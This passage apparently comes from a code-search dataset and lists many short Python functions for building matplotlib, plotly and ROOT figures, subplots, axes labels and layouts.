first_xtick_bbox.y0)\n height += lower_xticks_height\n\n last_xtick_bbox = self.get_bbox(xticks_objects[-1])\n # if last xticklabel bbox is heigher that the first, there are labels atop of the subplot\n if first_xtick_bbox.y0 != last_xtick_bbox.y0:\n upper_xticks_height = max(0, last_xtick_bbox.y1 - ax_bbox.y1)\n height += upper_xticks_height\n\n if 'xlabel' in annotations:\n xlabel_obj = annotations['xlabel']\n xlabel_height = self.get_bbox(xlabel_obj).height\n height += xlabel_height\n\n yticks_objects = ax.get_yticklabels()\n if len(yticks_objects) > 0:\n first_ytick_bbox = self.get_bbox(yticks_objects[0]) # first lower xticklabel bbox\n lower_yticks_width = max(0, ax_bbox.x0 - first_ytick_bbox.x0)\n width += lower_yticks_width\n\n if len(yticks_objects) > 1:\n last_ytick_bbox = self.get_bbox(yticks_objects[-1])\n # if last yticklabel bbox is righter that the first, there are labels to the right of the subplot\n if first_ytick_bbox.x0 != last_ytick_bbox.x0:\n right_yticks_width = max(0, last_ytick_bbox.x1 - ax_bbox.x1)\n width += right_yticks_width\n\n if 'ylabel' in annotations:\n ylabel_obj = annotations['ylabel']\n ylabel_width = self.get_bbox(ylabel_obj).width\n width += ylabel_width\n\n ax_widths.append(width)\n ax_heights.append(height)\n\n nrows, ncols 
= self.figure_config['ncols'], self.figure_config['nrows']\n ax_widths = np.array(ax_widths).reshape(nrows, ncols)\n extra_width += ax_widths.max(axis=1).sum()\n\n ax_heights = np.array(ax_heights).reshape(nrows, ncols)\n extra_height += ax_heights.max(axis=0).sum()\n\n fig_width, fig_height = self.figure_config['figsize']\n new_figsize = (fig_width + extra_width, fig_height + extra_height)\n self.figure.set_size_inches(new_figsize)", "def _handle_axes(self, drawable, option):\n # If we already have an axes object, ignore this one\n if self._axes_object is not None:\n return\n\n # Grab the histogram used for axes style/range manipulation\n if is_stack(drawable) or is_graph(drawable):\n axes_histogram = drawable.GetHistogram()\n else:\n axes_histogram = drawable\n\n # Grab the histogram used for title manipulation\n if is_stack(drawable):\n title_histogram = drawable.GetHists()[0]\n else:\n title_histogram = drawable\n\n # Set the plot title\n title_histogram.SetTitle(self._title)\n\n # Grab axes\n x_axis, y_axis = axes_histogram.GetXaxis(), axes_histogram.GetYaxis()\n\n # Grab titles from first histogram if not set explicitly\n if self._x_title is None:\n self._x_title = title_histogram.GetXaxis().GetTitle()\n if self._y_title is None:\n self._y_title = title_histogram.GetYaxis().GetTitle()\n\n # Style x-axis, or hide it if this plot has a ratio plot\n if self._x_range is not None:\n x_axis.SetRangeUser(*self._x_range)\n if self._ratio_plot:\n x_axis.SetLabelOffset(999)\n x_axis.SetTitleOffset(999)\n else:\n x_axis.SetTitle(self._x_title)\n x_axis.SetTitleSize(self.PLOT_X_AXIS_TITLE_SIZE)\n x_axis.SetTitleOffset(self.PLOT_X_AXIS_TITLE_OFFSET)\n x_axis.SetLabelSize(self.PLOT_X_AXIS_LABEL_SIZE)\n if self._x_integer_ticks:\n x_axis.SetNdivisions(11) # hack for integer ticks \n\n # Style y-axis\n y_axis.SetTitle(self._y_title)\n y_axis.SetLabelFont(self.PLOT_ATLAS_STAMP_TEXT_FONT)\n y_axis.SetTitleSize(\n (self.PLOT_Y_AXIS_TITLE_SIZE_WITH_RATIO\n if self._ratio_plot\n else self.PLOT_Y_AXIS_TITLE_SIZE)\n )\n y_axis.SetTitleOffset(\n (self.PLOT_Y_AXIS_TITLE_OFSET_WITH_RATIO\n if self._ratio_plot\n else self.PLOT_Y_AXIS_TITLE_OFFSET)\n )\n y_axis.SetNdivisions(5,5,0)\n \n # set axis text sizes \n if self._ratio_plot:\n y_axis.SetLabelSize(self.PLOT_Y_AXIS_LABEL_SIZE_WITH_RATIO)\n else:\n y_axis.SetLabelSize(self.PLOT_Y_AXIS_LABEL_SIZE) \n y_axis.SetTitleSize(self.PLOT_Y_AXIS_TITLE_SIZE)\n y_axis.SetTitleOffset(self.PLOT_RATIO_Y_AXIS_TITLE_OFFSET)\n\n # Redraw the drawable with the new style\n drawable.Draw(option)", "def subplots(nrows=1, ncols=1, sharex=False, sharey=False, squeeze=True, apportion = None, debug = 0, *args, **kwargs):\n #Note: we use squeeze = False internally, then return axes according to the keyword\n fig, axes = pylab_subplots(nrows=nrows, ncols=ncols, sharex=sharex, sharey=sharey, squeeze=False, *args, **kwargs)\n nrows = len(axes[:,0].flatten())\n # start with even allocation of unity\n fracts = np.ones(nrows)\n # if just one arg, that is the first allocation\n if apportion != None:\n if len(np.shape(apportion)) == 0:\n fracts[0]=apportion\n # fill up the rest\n for (i,a) in enumerate(apportion):\n if i<nrows: fracts[i] = a\n # now make into a fractions\n fracts = fracts/np.sum(fracts)\n\n #loop over axes, bottom to top, extract the space below and the height for each (ignore space above\n above = [] ; height = []\n lasty = 1\n for (i,ax) in enumerate(axes[:,0]):\n bb = ax.get_position().get_points()\n pos = bb.flatten() \n height.append(pos[3]-pos[1])\n above.append(lasty 
- pos[3] )\n lasty = pos[1]\n\n# loop again, building down from top according to new share, keep margins\n yabove_0 = 1 # the norm. y coord of the bottom of the above graph\n print(above, height)\n for col in range(np.shape(axes)[1]):\n for (i,ax) in enumerate(axes[:,col]):\n if (i==0): yabove = yabove_0\n bb = ax.get_position().get_points()\n pos = bb.flatten() \n # convert to x0,y0, dx, dy form by subtracting origin\n newh = height[i]*fracts[i]*nrows\n\n pos[1] = yabove - newh - above[i]\n pos[3] = newh\n pos[2] = pos[2] - pos[0]\n yabove = pos[1]\n if debug>0: print(pos)\n ax.set_position(pos)\n\n if squeeze: \n if len(np.shape(axes[0]))==0: axes = axes.flatten() \n if len(axes) == 1: axes = axes[0]\n return(fig, axes)", "def new_axes(self, name):\n\n return self.figure.add_axes([0.05, 0.05, 0.9, 0.9], label=name)", "def func_double_yaxis_data_subplot_show(data_plot_cfg_dic_nlst, axes_cfg_dic_lst,\n nrow, ncol, x_label, y1_label, y2_label,\n sub_titles=None, anno_text_lst=None, fig_title_lst=None,\n fig_size=None, subplot_fit_rect=None):\n\n # Create a figure\n fig, axs = plt.subplots(nrow, ncol, figsize=fig_size)\n\n # Plot the double-axis data for each subplot\n for index, ax in enumerate(axs.flat):\n ax1, ax2 = func_double_yaxis_data_plot(ax, data_plot_cfg_dic_nlst[index], axes_cfg_dic_lst,\n x_label, y1_label, y2_label)\n\n # Config the figure\n if index == 0:\n fontsize_label = axes_cfg_dic_lst[0].get('fontsize_label', 14)\n ax1.set_ylabel(y1_label, color='k', fontsize=fontsize_label)\n ax2.label_outer() # It seems label_outer() doesn't work for ax2, so I remove ytick labels manually\n ax2.set_yticklabels([])\n elif index == (ncol - 1):\n fontsize_label = axes_cfg_dic_lst[1].get('fontsize_label', 14)\n ax2.set_ylabel(y2_label, color='k', fontsize=fontsize_label)\n ax1.label_outer()\n\n ax1.get_legend().remove() # Remove individual legend for each subplot\n ax2.get_legend().remove() # Remove individual legend for each subplot\n # ax1.label_outer()\n # ax2.label_outer()\n\n # Define appearance\n func_matlab_style(ax)\n\n if fig_title_lst is not None:\n ax.set_title(fig_title_lst[index], fontweight='bold')\n if sub_titles is not None:\n ax.text(-25, -43, sub_titles[index], fontsize=11, fontweight='bold')\n if anno_text_lst is not None:\n ax.text(axes_cfg_dic_lst[0]['xlim'][0]+10, -5, anno_text_lst[index], fontsize=8)\n # ax.set_aspect('equal')\n\n ax1_handles, ax1_labels = ax1.get_legend_handles_labels()\n ax2_handles, ax2_labels = ax2.get_legend_handles_labels()\n handles = ax1_handles + ax2_handles\n labels = ax1_labels + ax2_labels\n fontsize_legend = axes_cfg_dic_lst[0].get('fontsize_legend', 12)\n fig.legend(handles, labels, ncol=4, loc='lower center', prop={'size': fontsize_legend})\n\n fig.tight_layout(rect=subplot_fit_rect) # otherwise the right y-label is slightly clipped\n plt.show()", "def plot(self, axes):\n if self.is_leaf:\n axes.plot([p.x for p in self.points], [p.y for p in self.points], 'bo')\n else:\n axes.plot([self.centre.x - self.size / 2, self.centre.x + self.size / 2],\n [self.centre.y, self.centre.y], '-', color='gray')\n axes.plot([self.centre.x, self.centre.x],\n [self.centre.y - self.size / 2, self.centre.y + self.size / 2],\n '-', color='gray')\n for child in self.children:\n child.plot(axes)\n axes.set_aspect(1)", "def get_ax(rows=1, cols=1, size=8):\r\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\r\n return ax", "def set_figure_variables(self):\n #self.fig.canvas.manager.full_screen_toggle()\n self.gs = self.fig.add_gridspec(2, 
3)\n self.ax1 = self.fig.add_subplot(self.gs[0, 0])\n self.ax2 = self.fig.add_subplot(self.gs[0, 1])\n self.ax3 = self.fig.add_subplot(self.gs[0, 2])\n self.ax4 = self.fig.add_subplot(self.gs[1, 0])\n self.ax5 = self.fig.add_subplot(self.gs[1, 1])\n self.ax6 = self.fig.add_subplot(self.gs[1, 2])\n # histogram with indicator scoring\n self.ax1.set_xlabel(\"indicators\")\n self.ax1.set_ylabel(\"score (%)\")\n # graph with flood safety levels\n self.ax2.set_xlabel(\"dike section\")\n self.ax2.set_ylabel(\"chance of flooding occurrence\")\n # graph with water levels vs dike height\n self.ax3.set_xlabel(\"river length (meters)\")\n self.ax3.set_ylabel(\"height (meters)\")\n # graph with overall costs made\n self.ax6.set_ylabel(\"million Euros\")\n \n self.ax1.set_ylim([0, 100])\n self.ax2.set_ylim([0, 100])\n self.ax3.set_ylim([14, 18])\n self.ax6.set_ylim([0, 25000000])\n \n self.ax1.set_title(\"Overall score on indicators\")\n self.ax2.set_title(\"Flood safety levels\")\n self.ax3.set_title(\"Normative water levels vs dike crest height\")\n self.ax6.set_title(\"Budget spent\")\n \n self.x_pos = np.arange(len(self.indicators))\n self.ax1.set_xticks(self.x_pos)\n self.ax1.set_xticklabels(self.indicators)\n \n flood_safety_levels = [100, 200, 400, 600, 800, 1000, 1250]\n self.ax2.set_yticks(flood_safety_levels)\n self.ax2.set_yticklabels([\"1/\"+str(value) for value in flood_safety_levels])\n \n self.plot1 = None\n self.plot2 = None\n self.plot3 = None\n self.plot4 = None\n self.plot5 = None\n self.plot6 = None\n return", "def plot(self):\n attr = self.Graph[\"root\"]\n if (self.type == 0 or self.type == 1):\n self.subplot_1(attr, 0)\n else:\n self.subplot_2(attr, 0)", "def create_four_subplots():\n pass", "def create_figure_with_subfigure(exercise_value):\n fig = make_subplots(\n rows=math.ceil(len(exercise_value) / 2),\n cols=2,\n subplot_titles=exercise_value,\n shared_xaxes=True,\n shared_yaxes=True,\n )\n return fig", "def subplot_for_map(show_x_axis=False, show_y_axis=False, aspect='equal', **kwargs):\n fig, ax = plt.subplots(**kwargs)\n ax.set_aspect(aspect)\n\n ax.get_xaxis().set_visible(show_x_axis)\n ax.get_yaxis().set_visible(show_y_axis)\n\n if show_x_axis:\n fig.autofmt_xdate()\n\n return fig, ax", "def build_scatter_subplot(fig, x, y, row_num, text, xaxis_text, yaxis_text):\n\n # Place provided data\n fig.add_trace(go.Scatter(x=x, y=y, mode=\"markers\", marker=dict(size=10)), row=row_num, col=1)\n # Approximate linear function\n res = sm.OLS(y, sm.add_constant(x)).fit().fittedvalues\n # Place trendline\n fig.add_trace(go.Scatter(x=x, y=res, mode=\"lines\"), row=row_num, col=1)\n # Place subplot (for the first subplot, we need to refer to the title of the figure itself) title\n if row_num == 1:\n fig.update_layout(title={\"text\": text})\n else:\n fig.layout.annotations[row_num - 2].update(text=text)\n # Place axis text\n fig.update_xaxes(title_text=xaxis_text, row=row_num, col=1)\n fig.update_yaxes(title_text=yaxis_text, row=row_num, col=1)", "def subplottPNG(self):\n os.chdir(self.mainDir)\n folder = os.listdir(u'.')\n folders = [f for f in folder if f[0] == 'S']\n\n for subject in folders:\n\n try: # go to the 'results' directory\n resultsDir = os.path.join(os.path.join(self.mainDir, subject),'results')\n os.chdir(resultsDir)\n\n # find all files with .png extension\n pngfiles = glob.glob('*.png')\n pngfiles.sort(key = lambda x:x[0])\n pngfiles.sort(key = lambda x:x[1])\n\n fig = plt.figure()\n\n for ii, filename in enumerate(pngfiles):\n f = plt.subplot(4,4,ii+1)\n 
f.set_axis_off()\n f.set_xlabel('ses:'+str(ii+1))# f.set_figheight(15)\n fig.set_figwidth(30)\n fig.set_figheight(30)\n fig.tight_layout()\n img = matplotlib.image.imread(filename)\n plt.imshow(img)\n\n figname = subject + '_subplot'+ '.png'\n matplotlib.pyplot.savefig(figname)\n\n except Exception as errMessage:\n print(errMessage)", "def new_axes(self, ax):\n self.ax = ax\n if self.canvas is not ax.figure.canvas:\n if self.canvas is not None:\n self.disconnect_events()\n\n self.canvas = ax.figure.canvas\n self.connect_default_events()\n\n # Reset\n self._selection_completed = False\n\n if self.direction == 'horizontal':\n trans = ax.get_xaxis_transform()\n w, h = 0, 1\n else:\n trans = ax.get_yaxis_transform()\n w, h = 1, 0\n rect_artist = Rectangle((0, 0), w, h,\n transform=trans,\n visible=False,\n **self._props)\n\n self.ax.add_patch(rect_artist)\n self._selection_artist = rect_artist", "def subplot_fit(self):\r\n\r\n self.open_subplot_figure(number_subplots=12)\r\n\r\n self.figures_2d(data=True)\r\n\r\n self.set_title(label=\"Data (Source Scale)\")\r\n self.figures_2d(data=True, use_source_vmax=True)\r\n self.set_title(label=None)\r\n\r\n self.figures_2d(signal_to_noise_map=True)\r\n self.figures_2d(model_image=True)\r\n\r\n self.set_title(label=\"Lens Light Model Image\")\r\n self.figures_2d_of_planes(plane_index=0, model_image=True)\r\n\r\n # If the lens light is not included the subplot index does not increase, so we must manually set it to 4\r\n self.mat_plot_2d.subplot_index = 6\r\n\r\n final_plane_index = len(self.fit.tracer.planes) - 1\r\n\r\n self.mat_plot_2d.cmap.kwargs[\"vmin\"] = 0.0\r\n\r\n self.set_title(label=\"Lens Light Subtracted Image\")\r\n self.figures_2d_of_planes(plane_index=final_plane_index, subtracted_image=True, use_source_vmax=True)\r\n\r\n self.set_title(label=\"Source Model Image (Image Plane)\")\r\n self.figures_2d_of_planes(plane_index=final_plane_index, model_image=True, use_source_vmax=True)\r\n\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmin\")\r\n\r\n self.set_title(label=\"Source Plane (Zoomed)\")\r\n self.figures_2d_of_planes(plane_index=final_plane_index, plane_image=True, use_source_vmax=True)\r\n\r\n\r\n self.set_title(label=None)\r\n\r\n self.mat_plot_2d.subplot_index = 9\r\n\r\n self.figures_2d(normalized_residual_map=True)\r\n\r\n self.mat_plot_2d.cmap.kwargs[\"vmin\"] = -1.0\r\n self.mat_plot_2d.cmap.kwargs[\"vmax\"] = 1.0\r\n\r\n self.set_title(label=\"Normalized Residual Map (1 sigma)\")\r\n self.figures_2d(normalized_residual_map=True)\r\n self.set_title(label=None)\r\n\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmin\")\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmax\")\r\n\r\n self.figures_2d(chi_squared_map=True)\r\n\r\n self.set_title(label=\"Source Plane (No Zoom)\")\r\n self.figures_2d_of_planes(\r\n plane_index=final_plane_index,\r\n plane_image=True,\r\n zoom_to_brightest=False,\r\n use_source_vmax=True\r\n )\r\n\r\n self.set_title(label=None)\r\n\r\n self.mat_plot_2d.output.subplot_to_figure(\r\n auto_filename=\"subplot_fit\"\r\n )\r\n self.close_subplot_figure()", "def plot_overlay2axes(self, axes) -> None:\n # calculate height (based on leaf analysis ratio)\n upper_point = (\n self.leaf_center_px - self.leaf_width_px / 2 * self._analysis_ratio\n )\n lower_point = (\n self.leaf_center_px + self.leaf_width_px / 2 * self._analysis_ratio\n )\n height = abs(upper_point - lower_point) * 0.8\n\n for idx, line in enumerate(self.marker_lines):\n width = abs(self.error[idx]) * self._image.dpmm\n y = line.center.y\n x = self.position[idx] - 
(self.error[idx] * self._image.dpmm) / 2\n\n if self._orientation == Orientation.UP_DOWN:\n r = Rectangle(width, height, center=(x, y))\n # if any of the values are over tolerance, show another larger rectangle to draw the eye\n if not self.passed[idx] or not self.passed_action[idx]:\n re = Rectangle(\n self._image_window.shape[1] * 0.2, height * 1.2, center=(x, y)\n )\n re.plot2axes(\n axes,\n edgecolor=\"none\",\n fill=True,\n alpha=0.5,\n facecolor=self.bg_color[idx],\n )\n else:\n r = Rectangle(height, width, center=(x, y))\n if not self.passed[idx] or not self.passed_action[idx]:\n re = Rectangle(\n self._image_window.shape[1] * 0.2, height * 1.2, center=(x, y)\n )\n re.plot2axes(\n axes,\n edgecolor=\"none\",\n fill=True,\n alpha=0.5,\n facecolor=self.bg_color[idx],\n )\n r.plot2axes(\n axes, edgecolor=\"none\", fill=True, alpha=1, facecolor=self.bg_color[idx]\n )", "def setup_figure_1ax(x_label='', y_label='', size=(13, 9), shrink_ax=True):\n\n matplotlib.rcParams.update({'font.size': 20})\n fig, ax = plt.subplots()\n fig.set_size_inches(size)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n # Shrink current axis by 20%\n if shrink_ax:\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.grid()\n return fig, ax", "def plot_evolution(self, layer, sublayer, figures=[], axes=[]):\n if figures==[]:\n figures.append(plt.figure(\"Basis evolution per recording (euclidean distance between sets of basis)\"))\n distance_legend = [\"Base N: \"+str(i) for i in range(len(self.basis[layer][sublayer]))]\n axes.append(figures[0].add_subplot('111'))\n axes[0].plot(self.basis_distance[layer][sublayer])\n axes[0].legend(tuple(distance_legend))\n axes[0].set_xlabel(\"Recording Number\")\n \n evolution_parameters=np.array([self.noise_history[layer][sublayer], \n self.learning_history[layer][sublayer],\n self.sparsity_history[layer][sublayer],\n self.sensitivity_history[layer][sublayer]]).transpose()\n evolution_legend = (\"Noise\",\"Learning step\",\"Sparsity\",\"Sensitivity\")\n figures.append(plt.figure(\"Network parameter evolution per recording\"))\n axes.append(figures[1].add_subplot('111'))\n axes[1].plot(evolution_parameters)\n axes[1].legend(tuple(evolution_legend))\n axes[1].set_xlabel(\"Recording Number\")\n else:\n \n axes[0].clear()\n distance_legend = [\"Base N: \"+str(i) for i in range(len(self.basis[layer][sublayer]))] \n axes[0].plot(self.basis_distance[layer][sublayer])\n axes[0].legend(tuple(distance_legend))\n axes[0].set_xlabel(\"Recording Number\")\n \n axes[1].clear()\n evolution_parameters=np.array([self.noise_history[layer][sublayer], \n self.learning_history[layer][sublayer],\n self.sparsity_history[layer][sublayer],\n self.sensitivity_history[layer][sublayer]]).transpose()\n evolution_legend = (\"Noise\",\"Learning step\",\"Sparsity\",\"Sensitivity\")\n axes[1].plot(evolution_parameters)\n axes[1].legend(tuple(evolution_legend))\n axes[1].set_xlabel(\"Recording Number\")\n return figures, axes", "def get_ax(rows=1, cols=1, size=8):\n fig , ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return fig,ax", "def get_ax(rows=1, cols=1, size=8):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def addFigure(self,fig,xl,yl,scale):\n img = py.image.load(fig)\n w,h = img.get_size()\n img = 
py.transform.scale(img,(int(w*scale),int(h*scale)))\n self.figures.append(img)\n self.locs.append((xl,yl))", "def draw_canvas(plt, nrows = 2, ncols = 1, gridspec_kw = None, sharex = True, multiscales = False):\n if not gridspec_kw: # Use default [1,1,1,1]\n ratios = ncols*nrows*[1]\n gridspec_kw = {\n 'height_ratios' : ratios,\n 'hspace' : 0,\n 'left' : 0.0,\n 'right' : 2.0,\n 'bottom' : 0.0,\n 'top' : 1.0 }\n fig, axis = plt.subplots(nrows, ncols, sharex = sharex, gridspec_kw = gridspec_kw)\n if isinstance(axis, np.ndarray): \n axis = [ec.extend_all(i) for i in axis]\n else:\n axis = [ec.extend_all(axis)]\n if multiscales:\n tmp = []\n for axe in axis:\n tmp_axe = axe.twinx()\n tmp.append(ec.extend_all(tmp_axe))\n axis += tmp\n\n return fig, axis", "def get_ax(rows=1, cols=1, size=8):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def get_ax(rows=1, cols=1, size=8):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def draw(subplots, title=''):\n if type(subplots) == SubPlot:\n subplots = [[subplots]]\n font_size = 16\n title_size = 20\n root = tk.Tk()\n root.title(title if title else 'Plot')\n root.geometry(\"1050x700\")\n fig = create_figure(root)\n\n num_rows = len(subplots)\n num_columns = max(len(graphs) for graphs in subplots)\n\n for i in range(num_rows):\n for j in range(num_columns):\n subplot = subplots[i][j]\n if subplot is None:\n continue\n index = (i*num_columns)+j+1\n ax = fig.add_subplot(num_rows, num_columns, index)\n ax.set_ylabel(subplot.y_label, fontsize=font_size)\n ax.set_xlabel(subplot.x_label, fontsize=font_size)\n ax.set_title(subplot.title, fontsize=font_size, fontweight='bold')\n ax.ticklabel_format(axis='y', style='sci')\n ax.ticklabel_format(useOffset=False)\n for graph in subplot.graphs:\n if type(graph) == Histogram:\n _draw_historgram(ax, graph)\n elif type(graph) == Graph:\n _draw_graph(ax, graph)\n '''\n spacing = 2\n if subplot.x_log:\n ax.set_xscale('log')\n x_lim = ax.get_xlim()\n ax.set_xlim(x_lim[0]/spacing, x_lim[1]*spacing)\n ax.grid(which='both')\n if subplot.y_log:\n ax.set_yscale('log')\n y_lim = ax.get_ylim()\n ax.set_ylim(y_lim[0]/spacing, y_lim[1]*spacing*3)\n ax.grid(which='both')\n '''\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n ax.legend(loc='best')\n\n fig.suptitle(title, fontweight='bold', fontsize=title_size)\n fig.subplots_adjust(hspace=.6, wspace=.3)\n root.mainloop()", "def show_axes(self):\n if hasattr(self, 'axes_widget'):\n self.axes_widget.EnabledOn()\n self.axes_widget.SetCurrentRenderer(self)\n else:\n self.add_axes()\n self.Modified()", "def one_data_figure_sep(obs, fig, subplot_spec=None, **kwargs):\n if subplot_spec is None:\n gs = gridspec.GridSpec(2,1,height_ratios = [3,1], hspace=0)\n else:\n gs = gridspec.GridSpecFromSubplotSpec(2, 1, hspace=0,\n subplot_spec=subplot_spec,\n height_ratios = [3,1])\n \n \n spec = pl.Subplot(fig, gs[0,0])\n spec.plot(obs['wavelength'], obs['spectrum'], **kwargs)\n spec.set_ylabel(r'$f_\\lambda \\times \\, C$')\n pl.setp(spec.get_xticklabels(), visible = False)\n fig.add_subplot(spec)\n unc = pl.Subplot(fig, gs[1,0])\n unc.plot(obs['wavelength'], obs['unc'], **kwargs)\n unc.set_ylabel(r'$\\sigma f_\\lambda$')\n unc.set_xlabel(r'$\\lambda (\\AA)$')\n fig.add_subplot(unc)\n return fig, gs", "def _update_axes(self):\n data_shape = self.data.shape\n if len(self.axes) < self.data.ndim + 1:\n self._axes.append(Axis())\n for index in range(self.data.ndim):\n if len(self.axes[index].values) != 
data_shape[index]:\n self.axes[index].values = np.arange(data_shape[index],\n dtype=np.float64)", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def _add_cluster_subplot(grid, position, y_label, colspan=1):\n config = load_config(None, join(get_common(), 'config.cfg'))\n plot_width = config.getint('common', 'plot_width')\n subplot = plt.subplot2grid(grid, position, colspan=colspan)\n subplot.set_ylabel(y_label)\n subplot.set_xlabel('number of clusters')\n subplot.set_xlim([-3, plot_width + 3])\n subplot.set_ylim([-0.05, 1.05])\n return subplot", "def get_ax(rows=1, cols=1, size=16):\n size = 5\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def get_ax(rows=1, cols=1, size=16):\n _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))\n return ax", "def __draw(self):\n plt.rcParams.update(self.settings.rcParams)\n\n self.fig = plt.figure()\n self.ax = self.fig.add_axes(self.axes_rect)\n\n xs = np.arange(1, self.xmax+1)\n ys = [np.arange(0, self.ymax) for i in range(self.xmax)]\n\n self.ax.plot(xs, ys)\n\n self.__draw_xaxis()\n self.__draw_yaxis()\n\n self.__draw_annotations()\n self.__draw_eras()\n self.__draw_era_spans()\n self.__draw_watermark()\n self.__draw_title()\n self.__draw_image()\n self.__draw_max_age()\n\n self.ax.set_aspect('equal', share=True)", "def _share_setup(self):\n # Panel axes sharing, between main subplot and its panels\n def shared(paxs):\n return [\n pax for pax in paxs\n if not pax._panel_filled and pax._panel_share\n ]\n\n if not self._panel_side: # this is a main axes\n # Top and bottom\n bottom = self\n paxs = shared(self._bpanels)\n if paxs:\n bottom = paxs[-1]\n for iax in (self, *paxs[:-1]):\n # parent is *bottom-most* panel\n iax._sharex_setup(bottom, 3)\n paxs = shared(self._tpanels)\n for iax in paxs:\n iax._sharex_setup(bottom, 3)\n # Left and right\n left = self\n paxs = shared(self._lpanels)\n if paxs:\n left = paxs[0]\n for iax in (*paxs[1:], self):\n iax._sharey_setup(left, 3) # parent is *bottom-most* panel\n paxs = shared(self._rpanels)\n for iax in paxs:\n iax._sharey_setup(left, 3)\n\n # Main axes, sometimes overrides panel axes sharing\n # TODO: This can get very repetitive, but probably minimal impact?\n # Share x axes\n parent, *children = self._get_extent_axes('x')\n for child in children:\n child._sharex_setup(parent)\n # Share y axes\n parent, *children = self._get_extent_axes('y')\n for child in children:\n child._sharey_setup(parent)", "def assemblePlot(self):\n self.clearPlot()\n self.axes = self.figure.add_subplot(111)\n\n # Reset handles\n self._fluxOverlayHandles = []\n self._magneticAxisHandle = None\n self._orbitHandles = []\n self._separatrixOverlayHandle = None\n self._wallCrossSectionOverlayHandle = None\n\n # Plot image\n self.plotEq()\n\n # Plot overlays\n self.plotOverlays()\n\n self.adjustAxes()", "def get_ax(rows=1, cols=1, size=32):\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax", "def show_figure_grid(fig: object, figx: int=10, figy: int=10) -> object:\n \n backGrid = fig.figure_handle.add_axes([0, 0, 1, 1], frameon=False)\n backGrid.set_ylim(0.0, figy)\n backGrid.set_xlim(0.0, figx)\n backGrid.grid(True)\n\n 
backGrid.set_yticks(np.arange(0.0, figy + 0.01, 1.0))\n backGrid.set_yticks(np.arange(0.0, figy + 0.01, 0.1), minor=True)\n backGrid.set_xticks(np.arange(0.0, figx + 0.01, 1.0))\n backGrid.set_xticks(np.arange(0.0, figx + 0.01, 0.1), minor=True)\n # backGrid.get_xaxis().set_minor_locator(matplotlib.ticker.AutoMinorLocator())\n # backGrid.get_yaxis().set_minor_locator(matplotlib.ticker.AutoMinorLocator())\n backGrid.grid(visible=True, which=\"major\", color=\"g\", alpha=0.5, linewidth=0.8)\n backGrid.grid(visible=True, which=\"minor\", color=\"g\", alpha=0.3, linewidth=0.2)\n return backGrid", "def figures(self):\n if np.size(self.iceicehorizons_depth1)>0:\n fig, ax = mpl.subplots()\n if self.site1.archive == 'icecore':\n mpl.xlabel(self.site1.label+' ice age (yr b1950)')\n else:\n mpl.xlabel(self.site1.label+' age (yr b1950)')\n if self.site2.archive == 'icecore':\n mpl.ylabel(self.site2.label+' ice age (yr b1950)')\n else:\n mpl.ylabel(self.site2.label+' age (yr b1950)')\n if np.size(self.iceicehorizons_depth1) > 0:\n if pccfg.show_initial:\n mpl.plot(self.site1.fct_age_init(self.iceicehorizons_depth1),\n self.site2.fct_age_init(self.iceicehorizons_depth2),\n color=pccfg.color_init, linestyle='', marker='o', markersize=2,\n label=\"Initial\")\n mpl.plot(self.site1.fct_age_model(self.iceicehorizons_depth1),\n self.site2.fct_age_model(self.iceicehorizons_depth2),\n color=pccfg.color_mod, linestyle='', marker='o', markersize=2,\n label=\"Prior\")\n mpl.errorbar(self.site1.fct_age(self.iceicehorizons_depth1),\n self.site2.fct_age(self.iceicehorizons_depth2), color=pccfg.color_opt,\n xerr=np.zeros(np.size(self.iceicehorizons_depth1)),\n linestyle='', marker='o', markersize=2,\n label=\"Posterior\")\n xstart = self.site1.fct_age(self.iceicehorizons_depth1)-self.iceicehorizons_sigma/2\n ystart = self.site2.fct_age(self.iceicehorizons_depth2)+self.iceicehorizons_sigma/2\n for i in range(np.size(self.iceicehorizons_depth1)):\n mpl.arrow(xstart[i], ystart[i], self.iceicehorizons_sigma[i],\n -self.iceicehorizons_sigma[i], color=pccfg.color_opt,\n width=0.0, head_length=0.0, head_width=0.0)\n x_low, x_up, y_low, y_up = mpl.axis()\n# x_low = self.site1.age_top\n# y_low = self.site2.age_top\n# mpl.axis((x_low, x_up, y_low, y_up))\n rangefig = np.array([min(x_low, y_low), max(x_up, y_up)])\n mpl.plot(rangefig, rangefig, color=pccfg.color_obs, label='perfect agreement', zorder=0)\n mpl.legend(loc=\"best\")\n ax.set_aspect('equal')\n if self.site1.archive == 'icecore' and self.site2.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/ice_ice_synchro.pdf')\n elif self.site1.archive == 'icecore' or self.site2.archive == 'icecore':\n printed_page = PdfPages(pccfg.datadir+self.label+'/ice_synchro.pdf')\n else:\n printed_page = PdfPages(pccfg.datadir+self.label+'/synchro.pdf')\n printed_page.savefig(fig)\n printed_page.close()\n if not pccfg.show_figures:\n mpl.close()\n\n if self.site1.archive == 'icecore' and self.site2.archive == 'icecore':\n if np.size(self.airairhorizons_depth1)>0:\n fig, ax = mpl.subplots()\n mpl.xlabel(self.site1.label+' air age (yr b1950)')\n mpl.ylabel(self.site2.label+' air age (yr b1950)')\n if np.size(self.airairhorizons_depth1) > 0:\n if pccfg.show_initial:\n 